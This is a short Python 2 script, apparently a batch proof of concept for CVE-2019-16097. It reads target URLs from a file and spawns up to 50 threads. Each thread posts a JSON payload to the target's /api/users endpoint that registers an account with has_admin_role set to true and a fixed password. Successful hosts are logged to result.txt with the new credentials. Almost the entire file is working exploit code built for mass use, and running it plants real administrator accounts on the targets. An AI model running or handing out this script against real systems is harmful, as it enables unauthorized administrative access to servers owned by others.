#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:rocky
# datetime:2019-09-21 00:43
# software: PyCharm


import requests
import logging
import threading

__author__ = 'rocky'
__date__ = '2019/9/21'


def poc(url):
    bug_url = url + "/api/users"
    payload = '{"username":"test","email":"[email protected]","realname":"test","password":"qq123123","comment":"1","has_admin_role":true}'
    header = {"Content-Type": "application/json", "Accept": "application/json"}
    try:
        r = requests.post(bug_url, data=payload, headers=header, timeout=10)
        print bug_url
        print r.status_code
        if r.status_code == 201:
            print "[!] This URL is Vulnerable !"
            print "[!] username: test   password: qq123123"

            f.write(url + "[!] This URL is Vulnerable ! [!] username: test   password: qq123123 " + "\n")
        else:
            print "[-] It's nothing."

    except Exception as e:
        logging.warning(bug_url)
        print e


if __name__ == '__main__':
    print "CVE-2019-16097-batch"
    print "author: " + __author__
    print "date: " + __date__
    f = open("result.txt", "a")
    url_list = [i.replace("\n", "") for i in open("url.txt", "r").readlines()]
    for url in url_list:
        threading.Thread(target=poc, args=(url,)).start()
        while 1:
            if (len(threading.enumerate()) < 50):
                break